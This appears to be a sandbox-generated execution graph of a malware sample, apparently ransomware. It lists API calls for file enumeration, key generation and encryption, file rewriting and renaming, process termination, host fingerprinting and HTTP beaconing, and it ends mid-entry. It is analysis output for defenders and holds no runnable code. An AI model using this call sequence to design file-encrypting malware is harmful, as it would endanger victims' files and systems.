                                        execution_graph 2339 f9d6d09 2340 f9d6d10 lstrcmpW 2339->2340 2341 f9d6d2a lstrcmpW 2340->2341 2342 f9d6db3 FindNextFileW 2340->2342 2341->2342 2344 f9d6d40 lstrcatW 2341->2344 2342->2340 2343 f9d6dcb FindClose 2342->2343 2345 f9d6dd4 2343->2345 2346 f9d6d53 lstrcatW 2344->2346 2349 f9d6d6c 2344->2349 2350 f9d6c90 2346->2350 2349->2342 2369 f9d6950 VirtualAlloc wsprintfW 2349->2369 2377 f9d6640 VirtualAlloc 2350->2377 2352 f9d6ca6 2353 f9d6dd4 2352->2353 2389 f9d6a40 lstrlenW lstrcatW FindFirstFileW 2352->2389 2353->2349 2355 f9d6cb5 2355->2353 2404 f9d6be0 VirtualAlloc wsprintfW CreateFileW 2355->2404 2357 f9d6cc2 lstrlenW lstrcatW FindFirstFileW 2358 f9d6cf8 2357->2358 2359 f9d6d04 2357->2359 2358->2349 2360 f9d6d10 lstrcmpW 2359->2360 2361 f9d6d2a lstrcmpW 2360->2361 2362 f9d6db3 FindNextFileW 2360->2362 2361->2362 2364 f9d6d40 lstrcatW 2361->2364 2362->2360 2363 f9d6dcb FindClose 2362->2363 2363->2353 2365 f9d6d53 lstrcatW 2364->2365 2368 f9d6d6c 2364->2368 2366 f9d6c90 102 API calls 2365->2366 2366->2368 2367 f9d6950 69 API calls 2367->2368 2368->2362 2368->2367 2412 f9d6850 2369->2412 2371 f9d69a7 VirtualFree 2371->2349 2372 f9d698a 2372->2371 2420 f9d6790 lstrlenW lstrlenW 2372->2420 2375 f9d69a3 2375->2371 2432 f9d35e0 GetFileAttributesW SetFileAttributesW 2375->2432 2379 f9d6667 2377->2379 2378 f9d676c VirtualFree 2378->2352 2379->2378 2380 f9d66e7 SHGetSpecialFolderPathW 2379->2380 2381 f9d66f8 2380->2381 2382 f9d6705 SHGetSpecialFolderPathW 2380->2382 2381->2378 2381->2382 2383 f9d671f SHGetSpecialFolderPathW 2382->2383 2384 f9d6712 2382->2384 2385 f9d672c 2383->2385 2386 f9d6739 SHGetSpecialFolderPathW 2383->2386 2384->2378 2384->2383 2385->2378 2385->2386 2387 f9d6746 2386->2387 2388 f9d6753 VirtualFree 2386->2388 2387->2378 2387->2388 2388->2352 2390 f9d6a90 lstrcmpW 2389->2390 2391 f9d6aa6 lstrcmpW 2390->2391 2392 f9d6bb2 FindNextFileW 2390->2392 2391->2392 2394 f9d6abc lstrcatW lstrlenW 2391->2394 2392->2390 2393 f9d6bca FindClose 2392->2393 2393->2355 2395 f9d6adf 2394->2395 2395->2392 2396 f9d6af4 lstrcmpW 2395->2396 2399 f9d6b92 CloseHandle 2395->2399 2401 f9d6b81 VirtualFree 2395->2401 2402 f9d6b69 lstrlenA 2395->2402 2396->2395 2397 f9d6b04 CreateFileW GetFileSize 2396->2397 2398 f9d6b31 VirtualAlloc 2397->2398 2397->2399 2398->2395 2400 f9d6b46 ReadFile 2398->2400 2399->2393 2399->2395 2400->2395 2400->2401 2401->2395 2410 f9d69e0 lstrlenA 2402->2410 2405 f9d6c2c GetLastError 2404->2405 2406 f9d6c3e 2404->2406 2407 f9d6c70 VirtualFree 2405->2407 2408 f9d6c64 CloseHandle 2406->2408 2409 f9d6c47 lstrlenW WriteFile 2406->2409 2407->2357 2408->2407 2409->2408 2411 f9d69fa 2410->2411 2411->2395 2413 f9d686a lstrlenW 2412->2413 2414 f9d6860 2412->2414 2415 f9d6890 2413->2415 2416 f9d687e 2413->2416 2414->2372 2415->2372 2416->2415 2417 f9d689b lstrlenW VirtualAlloc wsprintfW 2416->2417 2419 f9d68d8 VirtualFree 2417->2419 2419->2372 2421 f9d67be lstrcmpiW 2420->2421 2424 f9d67ac 2420->2424 2422 f9d67dc lstrcmpiW 2421->2422 2423 f9d67d3 2421->2423 2422->2423 2425 f9d67e8 lstrcmpiW 2422->2425 2423->2375 2424->2421 2425->2423 2426 f9d67f4 lstrcmpiW 2425->2426 2426->2423 2427 f9d6800 lstrcmpiW 2426->2427 2427->2423 2428 f9d680c lstrcmpiW 2427->2428 2428->2423 2429 f9d6818 lstrcmpiW 2428->2429 2429->2423 2430 f9d6824 lstrcmpiW 2429->2430 2430->2423 2431 f9d6830 lstrcmpiW 2430->2431 2431->2375 2462 f9d63d0 2432->2462 2435 f9d82a0 9 API calls 2436 f9d36a5 2435->2436 2437 f9d82a0 9 API calls 2436->2437 2438 f9d36b5 VirtualAlloc VirtualAlloc 2437->2438 2464 f9d6530 EnterCriticalSection CryptAcquireContextW 2438->2464 2441 f9d372b MessageBoxA 2443 f9d39d8 VirtualFree 2441->2443 2442 f9d3757 2444 f9d6530 10 API calls 2442->2444 2443->2371 2445 f9d376c 2444->2445 2446 f9d3773 GetLastError 2445->2446 2447 f9d3792 2445->2447 2446->2443 2448 f9d37a5 CreateFileW 2447->2448 2449 f9d37cd VirtualFree VirtualFree 2448->2449 2450 f9d37fc VirtualAlloc VirtualAlloc 2448->2450 2449->2443 2451 f9d3835 ReadFile 2450->2451 2452 f9d3940 VirtualFree 2451->2452 2460 f9d3832 _memmove 2451->2460 2453 f9d3958 WriteFile WriteFile WriteFile 2452->2453 2454 f9d3992 CloseHandle VirtualFree VirtualFree VirtualFree 2452->2454 2453->2454 2455 f9d39c9 MoveFileW 2454->2455 2456 f9d39d5 2454->2456 2455->2456 2456->2443 2457 f9d3888 VirtualAlloc 2457->2460 2458 f9d38a7 VirtualAlloc 2459 f9d38e5 VirtualFree SetFilePointer WriteFile 2458->2459 2458->2460 2459->2460 2461 f9d3927 VirtualFree 2459->2461 2460->2451 2460->2452 2460->2457 2460->2458 2460->2459 2460->2461 2461->2452 2461->2460 2463 f9d3626 VirtualAlloc lstrcpyW lstrcatW 2462->2463 2463->2435 2465 f9d659e CryptImportKey 2464->2465 2466 f9d6568 GetLastError 2464->2466 2468 f9d65c3 CryptGetKeyParam CryptEncrypt GetLastError 2465->2468 2469 f9d6622 CryptReleaseContext LeaveCriticalSection 2465->2469 2467 f9d6575 CryptAcquireContextW 2466->2467 2470 f9d3724 2466->2470 2467->2470 2471 f9d6595 2467->2471 2468->2469 2472 f9d661a 2468->2472 2469->2470 2470->2441 2470->2442 2471->2465 2472->2469 2473 f9d48a8 2474 f9d48b0 lstrcmpiW 2473->2474 2475 f9d48bf OpenProcess 2474->2475 2476 f9d48a4 2474->2476 2475->2476 2477 f9d48d1 TerminateProcess CloseHandle 2475->2477 2476->2474 2478 f9d48f4 Process32NextW 2476->2478 2477->2476 2478->2476 2479 f9d4907 2478->2479 2480 f9d4919 CloseHandle 2479->2480 2481 f9d490b VirtualFree 2479->2481 2481->2480 2210 f9d4bd5 2213 f9d64f0 VirtualFree VirtualFree 2210->2213 2212 f9d4be4 2213->2212 2214 f9d41d6 2222 f9d41e0 2214->2222 2215 f9d4286 2216 f9d43a8 VirtualFree 2215->2216 2217 f9d4377 VirtualAlloc 2215->2217 2220 f9d7c10 10 API calls 2216->2220 2217->2216 2219 f9d4394 wsprintfW 2217->2219 2218 f9d4210 lstrcpyW lstrlenW 2218->2215 2218->2222 2219->2216 2221 f9d43c8 2220->2221 2222->2215 2222->2218 1682 f9d4bf0 1683 f9d4c0d CreateThread 1682->1683 1684 f9d4c2b FindCloseChangeNotification 1683->1684 1685 f9d4c35 1683->1685 1686 f9d4950 Sleep 1683->1686 1684->1685 1731 f9d4600 1686->1731 1689 f9d496a ExitProcess 1690 f9d4972 CreateThread 1691 f9d49bc 1690->1691 1692 f9d4990 WaitForSingleObject 1690->1692 1747 f9d46f0 CreateToolhelp32Snapshot VirtualAlloc 1691->1747 1693 f9d49a6 TerminateThread 1692->1693 1694 f9d49b2 CloseHandle 1692->1694 1693->1694 1694->1691 1696 f9d49c1 1758 f9d40e0 1696->1758 1700 f9d49ce 1701 f9d4a1c VirtualAlloc 1700->1701 1708 f9d4a6b 1700->1708 1703 f9d4a39 GetModuleFileNameW 1701->1703 1704 f9d4a63 ExitProcess 1701->1704 1702 f9d4aa5 1710 f9d4b18 1702->1710 1711 f9d4acf lstrlenA VirtualAlloc CryptStringToBinaryA 1702->1711 1781 f9d3be0 1703->1781 1708->1702 1709 f9d4a8f Sleep 1708->1709 1792 f9d5880 1708->1792 1709->1708 1836 f9d4030 1710->1836 1711->1710 1713 f9d4b10 ExitProcess 1711->1713 1714 f9d4b24 InitializeCriticalSection 1715 f9d4b35 1714->1715 1716 f9d4b42 1714->1716 1839 f9d4000 1715->1839 1845 f9d3e20 VirtualAlloc GetTickCount 1716->1845 1720 f9d4b4a DeleteCriticalSection 1853 f9d3aa0 AllocateAndInitializeSid 1720->1853 1722 f9d4b5a 1723 f9d4b63 VirtualAlloc 1722->1723 1857 f9d43e0 1722->1857 1725 f9d4baa 1723->1725 1726 f9d4b80 GetModuleFileNameW 1723->1726 1727 f9d4bcd ExitThread 1725->1727 1728 f9d4bb3 ShellExecuteW 1725->1728 1729 f9d3be0 17 API calls 1726->1729 1728->1727 1730 f9d4b99 VirtualFree 1729->1730 1730->1725 1864 f9d39f0 GetProcessHeap 1731->1864 1733 f9d4637 1865 f9d7330 1733->1865 1737 f9d4649 VirtualAlloc 1738 f9d4668 lstrcpyW lstrlenW 1737->1738 1951 f9d6f40 1738->1951 1741 f9d4699 CreateMutexW GetLastError 1742 f9d46ba VirtualFree 1741->1742 1743 f9d46b1 GetLastError 1741->1743 1977 f9d7c10 1742->1977 1743->1742 1748 f9d4888 1747->1748 1752 f9d489b 1747->1752 1749 f9d4893 Process32FirstW 1748->1749 1748->1752 1749->1752 1750 f9d48b0 lstrcmpiW 1751 f9d48bf OpenProcess 1750->1751 1750->1752 1751->1752 1753 f9d48d1 TerminateProcess CloseHandle 1751->1753 1752->1750 1754 f9d48f4 Process32NextW 1752->1754 1753->1752 1754->1752 1755 f9d4907 1754->1755 1756 f9d4919 CloseHandle 1755->1756 1757 f9d490b VirtualFree 1755->1757 1756->1696 1757->1756 1759 f9d43c8 1758->1759 1760 f9d40fb 1758->1760 1778 f9d6420 VirtualAlloc VirtualAlloc 1759->1778 2049 f9d39f0 GetProcessHeap 1760->2049 1762 f9d4126 1763 f9d7330 98 API calls 1762->1763 1764 f9d4132 1763->1764 1765 f9d7140 16 API calls 1764->1765 1766 f9d413e VirtualAlloc 1765->1766 1767 f9d4162 1766->1767 1768 f9d6f40 49 API calls 1767->1768 1769 f9d4180 1768->1769 1770 f9d418c lstrlenW 1769->1770 1777 f9d41c0 1770->1777 1771 f9d4286 1772 f9d43a8 VirtualFree 1771->1772 1773 f9d4377 VirtualAlloc 1771->1773 1776 f9d7c10 10 API calls 1772->1776 1773->1772 1775 f9d4394 wsprintfW 1773->1775 1774 f9d4210 lstrcpyW lstrlenW 1774->1771 1774->1777 1775->1772 1776->1759 1777->1771 1777->1774 2050 f9d62b0 CryptAcquireContextW 1778->2050 2058 f9d3b20 1781->2058 1783 f9d3bf6 1784 f9d3dfa VirtualFree 1783->1784 1785 f9d3aa0 4 API calls 1783->1785 1784->1704 1786 f9d3c03 1785->1786 1786->1784 1787 f9d3c0b ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1786->1787 1788 f9d3de0 ShellExecuteExW 1787->1788 1789 f9d3de7 1788->1789 1790 f9d3e01 WaitForSingleObject CloseHandle ExitProcess 1788->1790 1789->1788 1791 f9d3ded VirtualFree 1789->1791 1791->1784 2063 f9d39f0 GetProcessHeap 1792->2063 1794 f9d58c4 1795 f9d7330 98 API calls 1794->1795 1796 f9d58cd 1795->1796 1797 f9d7140 16 API calls 1796->1797 1798 f9d58d6 VirtualAlloc 1797->1798 1799 f9d590e 1798->1799 1800 f9d597b 6 API calls 1799->1800 1801 f9d5d44 1799->1801 1802 f9d59fa lstrlenA 1800->1802 1804 f9d5d4f VirtualFree 1801->1804 1805 f9d5a22 lstrlenA 1802->1805 1806 f9d7c10 10 API calls 1804->1806 1809 f9d5a72 lstrlenA 1805->1809 1815 f9d5a3e lstrlenA 1805->1815 1808 f9d5d65 1806->1808 1808->1708 1810 f9d5aa1 lstrcatW lstrlenW 1809->1810 1817 f9d5a7b lstrlenA 1809->1817 1811 f9d6f40 49 API calls 1810->1811 1814 f9d5ac9 12 API calls 1811->1814 1818 f9d5b6a lstrlenW 1814->1818 1816 f9d5a6e 1815->1816 1816->1809 1817->1810 1820 f9d9010 _memset 1818->1820 1821 f9d5bcc lstrlenA 1820->1821 1822 f9d5bed 1821->1822 1823 f9d5c04 CryptBinaryToStringA 1822->1823 1824 f9d5c36 lstrlenA VirtualAlloc lstrlenA 1823->1824 1825 f9d5c30 GetLastError 1823->1825 1826 f9d5c5e lstrlenA 1824->1826 1825->1824 1828 f9d5c9e lstrlenA MultiByteToWideChar 1826->1828 1829 f9d5c77 lstrlenA 1826->1829 2064 f9d54a0 1828->2064 1829->1828 1833 f9d5d07 VirtualFree VirtualFree VirtualFree 1833->1801 1834 f9d5cd6 VirtualFree VirtualFree VirtualFree 1834->1804 1837 f9d403d VirtualAlloc 1836->1837 1838 f9d4058 1836->1838 1837->1838 1838->1714 1838->1838 1840 f9d4014 1839->1840 1841 f9d3e20 276 API calls 1840->1841 1842 f9d401c 1841->1842 2182 f9d64f0 VirtualFree VirtualFree 1842->2182 1844 f9d4024 1844->1720 1846 f9d3e80 GetDriveTypeW 1845->1846 1847 f9d3e95 1846->1847 1847->1846 1848 f9d3e9a CreateThread 1847->1848 1849 f9d3ede WaitForMultipleObjects GetTickCount 1847->1849 1848->1847 1850 f9d3f3f 1849->1850 2183 f9d5670 VirtualAlloc 1850->2183 1852 f9d3fed 1852->1720 1854 f9d3ade GetModuleHandleA GetProcAddress 1853->1854 1855 f9d3ada 1853->1855 1856 f9d3b00 FreeSid 1854->1856 1855->1722 1856->1722 1858 f9d3b20 4 API calls 1857->1858 1859 f9d43f4 VirtualAlloc 1858->1859 1861 f9d45af GetSystemDirectoryW lstrcatW ShellExecuteW 1859->1861 1862 f9d45ab 1859->1862 1863 f9d45df VirtualFree 1861->1863 1862->1863 1863->1723 1864->1733 1866 f9d736e 1865->1866 1867 f9d7349 VirtualAlloc GetUserNameW 1865->1867 1868 f9d7374 VirtualAlloc GetComputerNameW 1866->1868 1869 f9d7396 1866->1869 1867->1866 1868->1869 1870 f9d73f6 1869->1870 1871 f9d73a2 VirtualAlloc 1869->1871 1872 f9d7495 1870->1872 1873 f9d7400 VirtualAlloc RegOpenKeyExW 1870->1873 1871->1870 1874 f9d73b9 1871->1874 1877 f9d749f VirtualAlloc VirtualAlloc 1872->1877 1878 f9d7599 1872->1878 1875 f9d743c RegQueryValueExW 1873->1875 1876 f9d747e VirtualFree 1873->1876 1998 f9d72b0 RegOpenKeyExW 1874->1998 1880 f9d7469 GetLastError 1875->1880 1881 f9d7460 1875->1881 1876->1872 1884 f9d74d4 wsprintfW RegOpenKeyExW 1877->1884 1882 f9d759f VirtualAlloc 1878->1882 1883 f9d75fb 1878->1883 1885 f9d746f RegCloseKey 1880->1885 1881->1885 1886 f9d72b0 5 API calls 1882->1886 1888 f9d766e 1883->1888 1889 f9d7601 GetNativeSystemInfo VirtualAlloc 1883->1889 1887 f9d7509 RegQueryValueExW 1884->1887 1895 f9d752b 1884->1895 1885->1872 1885->1876 1894 f9d75cd 1886->1894 1887->1895 1896 f9d7534 GetLastError 1887->1896 1892 f9d768f 1888->1892 1893 f9d7674 1888->1893 1897 f9d7624 1889->1897 1898 f9d7647 wsprintfW 1889->1898 1890 f9d73d4 1890->1870 1891 f9d73f1 wsprintfW 1890->1891 1891->1870 1902 f9d77d9 1892->1902 1903 f9d7699 VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW 1892->1903 2003 f9d7a10 VirtualAlloc VirtualAlloc 1893->2003 1894->1883 1906 f9d72b0 5 API calls 1894->1906 1895->1884 1899 f9d7576 wsprintfW VirtualFree 1895->1899 1904 f9d753a RegCloseKey 1895->1904 1896->1904 1897->1898 1905 f9d7632 wsprintfW ExitProcess 1897->1905 1898->1888 1899->1878 1910 f9d77e9 VirtualAlloc 1902->1910 1911 f9d7992 1902->1911 1908 f9d72b0 5 API calls 1903->1908 1904->1895 1909 f9d7549 lstrcmpiW 1904->1909 1912 f9d75ee wsprintfW 1906->1912 1907 f9d7688 1907->1892 1913 f9d7725 1908->1913 1909->1895 1909->1905 1931 f9d7840 1910->1931 1914 f9d799b VirtualAlloc 1911->1914 1915 f9d4640 1911->1915 1912->1883 1916 f9d7729 lstrlenW 1913->1916 1917 f9d775a wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1913->1917 1921 f9d79b9 1914->1921 1922 f9d79d6 1914->1922 1933 f9d7140 1915->1933 1918 f9d72b0 5 API calls 1916->1918 1919 f9d779d lstrlenW 1917->1919 1920 f9d77b4 VirtualFree 1917->1920 1918->1917 1919->1920 1920->1902 2021 f9d6e90 1921->2021 1922->1915 1924 f9d7862 GetDriveTypeW 1924->1931 1927 f9d7889 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1930 f9d7963 lstrcatW 1927->1930 1927->1931 1928 f9d79c4 VirtualFree 1928->1922 1929 f9d7983 lstrlenW 1929->1911 1930->1931 1931->1924 1931->1927 1931->1929 1932 f9d78fc lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1931->1932 1932->1931 1934 f9d7150 1933->1934 1935 f9d718f lstrlenW lstrlenW 1934->1935 1936 f9d71aa 1934->1936 1935->1936 1937 f9d71cb 1936->1937 1938 f9d71b0 lstrlenW lstrlenW 1936->1938 1939 f9d71ec 1937->1939 1940 f9d71d1 lstrlenW lstrlenW 1937->1940 1938->1937 1941 f9d720d 1939->1941 1942 f9d71f2 lstrlenW lstrlenW 1939->1942 1940->1939 1943 f9d722e 1941->1943 1944 f9d7213 lstrlenW lstrlenW 1941->1944 1942->1941 1945 f9d724f 1943->1945 1946 f9d7234 lstrlenW lstrlenW 1943->1946 1944->1943 1947 f9d725e lstrlenW lstrlenW 1945->1947 1948 f9d7279 1945->1948 1946->1945 1947->1948 1949 f9d72a7 1948->1949 1950 f9d7282 lstrlenW lstrlenW 1948->1950 1949->1737 1950->1737 1952 f9d6f7c 1951->1952 1953 f9d6f5a lstrcatW lstrcatW lstrcatW lstrcatW 1951->1953 1954 f9d6f9d 1952->1954 1955 f9d6f81 lstrcatW lstrcatW lstrcatW lstrcatW 1952->1955 1953->1952 1956 f9d6fbf 1954->1956 1957 f9d6fa3 lstrcatW lstrcatW lstrcatW lstrcatW 1954->1957 1955->1954 1958 f9d6fc5 lstrcatW lstrcatW lstrcatW lstrcatW 1956->1958 1959 f9d6fe1 1956->1959 1957->1956 1958->1959 1960 f9d6fe7 lstrcatW lstrcatW lstrcatW lstrcatW 1959->1960 1961 f9d7003 1959->1961 1960->1961 1962 f9d7009 lstrcatW lstrcatW lstrcatW lstrcatW 1961->1962 1963 f9d7025 1961->1963 1962->1963 1964 f9d702b lstrcatW lstrcatW lstrcatW lstrcatW 1963->1964 1965 f9d7047 1963->1965 1964->1965 1966 f9d704d lstrcatW lstrcatW lstrcatW lstrcatW 1965->1966 1967 f9d7069 1965->1967 1966->1967 1968 f9d706f lstrcatW lstrcatW lstrcatW lstrcatW 1967->1968 1969 f9d708b 1967->1969 1968->1969 1970 f9d70fc 1969->1970 1971 f9d7091 VirtualAlloc 1969->1971 1974 f9d711e lstrlenW 1970->1974 1975 f9d7102 lstrcatW lstrcatW lstrcatW lstrcatW 1970->1975 1972 f9d70ac wsprintfW 1971->1972 1973 f9d70c1 wsprintfW 1971->1973 1976 f9d70d0 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1972->1976 1973->1976 1974->1741 1975->1974 1976->1970 1978 f9d7c1f VirtualFree 1977->1978 1979 f9d7c2b 1977->1979 1978->1979 1980 f9d7c3d 1979->1980 1981 f9d7c31 VirtualFree 1979->1981 1982 f9d7c4f 1980->1982 1983 f9d7c43 VirtualFree 1980->1983 1981->1980 1984 f9d7c55 VirtualFree 1982->1984 1985 f9d7c61 1982->1985 1983->1982 1984->1985 1986 f9d7c67 VirtualFree 1985->1986 1987 f9d7c73 1985->1987 1986->1987 1988 f9d7c79 VirtualFree 1987->1988 1989 f9d7c85 1987->1989 1988->1989 1990 f9d7c8b VirtualFree 1989->1990 1991 f9d7c97 1989->1991 1990->1991 1992 f9d7c9d VirtualFree 1991->1992 1993 f9d7ca9 1991->1993 1992->1993 1994 f9d7caf VirtualFree 1993->1994 1995 f9d7cbb 1993->1995 1994->1995 1996 f9d7cc4 VirtualFree 1995->1996 1997 f9d46da 1995->1997 1996->1997 1997->1689 1997->1690 1999 f9d731e 1998->1999 2000 f9d72d2 RegQueryValueExW 1998->2000 1999->1890 2001 f9d7306 GetLastError RegCloseKey 2000->2001 2002 f9d72f1 RegCloseKey 2000->2002 2001->1890 2002->1890 2004 f9d7aac CreateToolhelp32Snapshot 2003->2004 2005 f9d7ad2 2003->2005 2006 f9d7add Process32FirstW 2004->2006 2007 f9d7ac4 VirtualFree 2004->2007 2005->1907 2008 f9d7bcd VirtualFree CloseHandle 2006->2008 2015 f9d7afd 2006->2015 2007->2005 2009 f9d7bed VirtualFree 2008->2009 2010 f9d7bf7 2008->2010 2009->2010 2010->1907 2011 f9d7ba7 2013 f9d7bc5 2011->2013 2014 f9d7bb5 lstrlenW 2011->2014 2012 f9d7b10 lstrcmpiW 2012->2015 2013->2008 2014->2013 2015->2011 2015->2012 2016 f9d7b4f lstrcatW lstrcatW 2015->2016 2017 f9d7b3a lstrcpyW lstrcatW 2015->2017 2018 f9d7b87 Process32NextW 2015->2018 2019 f9d7b60 lstrlenW 2016->2019 2017->2019 2018->2011 2020 f9d7b98 GetLastError 2018->2020 2019->2018 2020->2011 2020->2015 2031 f9d7ce0 InternetOpenW 2021->2031 2025 f9d6ee6 2026 f9d6eea lstrlenA 2025->2026 2027 f9d6f11 VirtualFree 2025->2027 2026->2027 2028 f9d6efa wsprintfW 2026->2028 2029 f9d6f2d 2027->2029 2030 f9d6f26 InternetCloseHandle 2027->2030 2028->2027 2029->1915 2029->1928 2030->2029 2032 f9d7ecd InternetOpenW 2031->2032 2033 f9d6ea2 VirtualAlloc lstrlenW 2031->2033 2032->2033 2034 f9d7ef0 2033->2034 2035 f9d7f09 2034->2035 2036 f9d7f02 InternetCloseHandle 2034->2036 2037 f9d7ce0 2 API calls 2035->2037 2036->2035 2038 f9d7f10 InternetConnectW 2037->2038 2039 f9d7f38 2038->2039 2040 f9d7f41 VirtualAlloc wsprintfW HttpOpenRequestW 2038->2040 2039->2025 2041 f9d7f91 HttpAddRequestHeadersW 2040->2041 2042 f9d8062 InternetCloseHandle InternetCloseHandle VirtualFree 2040->2042 2041->2042 2043 f9d7ff8 HttpSendRequestW 2041->2043 2042->2025 2044 f9d805c GetLastError 2043->2044 2045 f9d800f InternetReadFile 2043->2045 2044->2042 2045->2042 2046 f9d802e 2045->2046 2046->2042 2047 f9d8037 InternetReadFile 2046->2047 2047->2046 2048 f9d805a 2047->2048 2048->2042 2049->1762 2051 f9d62cf GetLastError 2050->2051 2052 f9d6305 CryptGenKey 2050->2052 2055 f9d62dc CryptAcquireContextW 2051->2055 2056 f9d62f5 2051->2056 2053 f9d6321 2052->2053 2054 f9d6322 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 2052->2054 2053->2054 2054->2056 2055->2056 2057 f9d62fc 2055->2057 2056->1700 2057->2052 2061 f9d9010 2058->2061 2062 f9d3b77 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2061->2062 2062->1783 2063->1794 2065 f9d7ce0 2 API calls 2064->2065 2066 f9d54bc 2065->2066 2082 f9d5060 VirtualAlloc 2066->2082 2069 f9d5503 lstrcatA lstrcatA lstrlenA 2071 f9d9010 _memset 2069->2071 2072 f9d5592 lstrcpyW 2071->2072 2091 f9d53a0 VirtualAlloc GetModuleFileNameW CreateFileW 2072->2091 2074 f9d55b2 lstrlenW lstrlenA 2075 f9d7ef0 15 API calls 2074->2075 2076 f9d55f4 2075->2076 2077 f9d5628 VirtualFree VirtualFree VirtualFree 2076->2077 2101 f9d5210 lstrlenA VirtualAlloc 2076->2101 2078 f9d565e 2077->2078 2079 f9d5657 InternetCloseHandle 2077->2079 2078->1833 2078->1834 2079->2078 2081 f9d5614 2081->2077 2083 f9d517f lstrlenA VirtualAlloc VirtualAlloc 2082->2083 2084 f9d50d9 2082->2084 2083->2069 2085 f9d50fe Sleep 2084->2085 2086 f9d5109 lstrlenW VirtualAlloc 2084->2086 2085->2086 2122 f9d4e90 CreatePipe 2086->2122 2088 f9d5134 lstrcmpiA 2089 f9d515c wsprintfW VirtualFree 2088->2089 2090 f9d5147 VirtualFree 2088->2090 2089->2083 2090->2084 2092 f9d53f9 CreateFileMappingW 2091->2092 2093 f9d5487 VirtualFree 2091->2093 2094 f9d5411 MapViewOfFile 2092->2094 2095 f9d5480 CloseHandle 2092->2095 2093->2074 2096 f9d5477 CloseHandle 2094->2096 2097 f9d5427 lstrlenW lstrlenA 2094->2097 2095->2093 2096->2095 2098 f9d5468 UnmapViewOfFile 2097->2098 2099 f9d5444 lstrlenA 2097->2099 2098->2096 2099->2098 2102 f9d5246 CryptStringToBinaryA 2101->2102 2104 f9d526c _memset 2102->2104 2105 f9d5385 GetLastError 2102->2105 2107 f9d52b0 lstrlenA 2104->2107 2106 f9d536c VirtualFree 2105->2106 2106->2081 2108 f9d52ce 2107->2108 2151 f9d33e0 2108->2151 2111 f9d538d 2161 f9d5190 VirtualAlloc VirtualAlloc 2111->2161 2112 f9d52fa 2114 f9d531c lstrlenA VirtualAlloc 2112->2114 2118 f9d5341 2112->2118 2116 f9d5339 lstrcpyA 2114->2116 2114->2118 2116->2118 2117 f9d535d 2119 f9d5369 2117->2119 2121 f9d5366 HeapFree 2117->2121 2118->2117 2120 f9d5355 HeapFree 2118->2120 2119->2106 2120->2117 2121->2119 2123 f9d4fbd SetHandleInformation 2122->2123 2124 f9d4fb3 2122->2124 2123->2124 2125 f9d4fd3 CreatePipe SetHandleInformation 2123->2125 2124->2088 2125->2124 2126 f9d4ffc VirtualAlloc 2125->2126 2127 f9d504b lstrcpyA 2126->2127 2128 f9d5016 wsprintfW 2126->2128 2127->2088 2133 f9d4c40 2128->2133 2130 f9d502b 2138 f9d4de0 2130->2138 2134 f9d9010 _memset 2133->2134 2135 f9d4c5e CreateProcessW 2134->2135 2136 f9d4ca9 GetLastError 2135->2136 2137 f9d4cb4 CloseHandle CloseHandle 2135->2137 2136->2130 2137->2130 2143 f9d4ded 2138->2143 2139 f9d4df6 ReadFile 2140 f9d4e65 2139->2140 2139->2143 2141 f9d4e83 VirtualFree 2140->2141 2144 f9d4cd0 2140->2144 2141->2088 2143->2139 2143->2140 2147 f9d4cfb 2144->2147 2145 f9d4d35 lstrcpyA 2145->2141 2146 f9d4d93 lstrlenA 2149 f9d4da0 lstrcpyA 2146->2149 2147->2145 2147->2146 2148 f9d4d8d 2147->2148 2148->2145 2149->2141 2165 f9d32b0 lstrlenA 2151->2165 2154 f9d34d9 ExitProcess 2156 f9d3412 2156->2111 2156->2112 2158 f9d3483 lstrlenA GetProcessHeap HeapAlloc 2159 f9d3407 2158->2159 2160 f9d34a5 lstrcpyA 2158->2160 2159->2156 2159->2158 2169 f9d3190 2159->2169 2173 f9d3200 2159->2173 2160->2159 2162 f9d51f9 ExitProcess 2161->2162 2163 f9d51c0 GetModuleFileNameW 2161->2163 2163->2162 2164 f9d51d2 wsprintfW ShellExecuteW 2163->2164 2164->2162 2166 f9d32cf 2165->2166 2167 f9d32f8 2165->2167 2168 f9d32d0 lstrlenA 2166->2168 2167->2154 2167->2159 2168->2167 2168->2168 2170 f9d319e 2169->2170 2171 f9d31b0 lstrcmpiA lstrcmpiA 2169->2171 2170->2171 2172 f9d31f1 2170->2172 2171->2159 2172->2159 2174 f9d3210 2173->2174 2175 f9d323d 2174->2175 2176 f9d326d 2174->2176 2177 f9d3250 lstrlenA GetProcessHeap HeapAlloc 2174->2177 2175->2159 2179 f9d3299 2176->2179 2180 f9d3272 lstrlenA GetProcessHeap HeapAlloc 2176->2180 2178 f9d328d 2177->2178 2178->2179 2181 f9d3291 lstrcpyA 2178->2181 2179->2159 2180->2178 2181->2179 2182->1844 2184 f9d569c wsprintfW 2183->2184 2209 f9d39f0 GetProcessHeap 2184->2209 2187 f9d56ef 2188 f9d7330 98 API calls 2187->2188 2189 f9d56fa 2188->2189 2190 f9d7140 16 API calls 2189->2190 2191 f9d5705 lstrlenW 2190->2191 2192 f9d6f40 49 API calls 2191->2192 2193 f9d571d lstrlenW 2192->2193 2194 f9d9010 _memset 2193->2194 2195 f9d5766 lstrlenA 2194->2195 2196 f9d5782 2195->2196 2197 f9d5797 CryptBinaryToStringA 2196->2197 2198 f9d57bc GetLastError 2197->2198 2199 f9d57c2 lstrlenA VirtualAlloc lstrlenA 2197->2199 2198->2199 2200 f9d57ee lstrlenA 2199->2200 2202 f9d5822 2200->2202 2206 f9d5805 lstrlenA 2200->2206 2203 f9d54a0 97 API calls 2202->2203 2205 f9d582e VirtualFree 2203->2205 2207 f9d7c10 10 API calls 2205->2207 2206->2202 2208 f9d585d VirtualFree 2207->2208 2208->1852 2209->2187 2223 f9d2d10 SendMessageW ExitThread 2224 f9d2d30 2245 f9d2f50 EnumDeviceDrivers 2224->2245 2226 f9d2d8c 2227 f9d2de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2226->2227 2230 f9d2f50 7 API calls 2226->2230 2228 f9d2e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2227->2228 2229 f9d2e75 ExitThread 2227->2229 2231 f9d2ebe ExitThread 2228->2231 2232 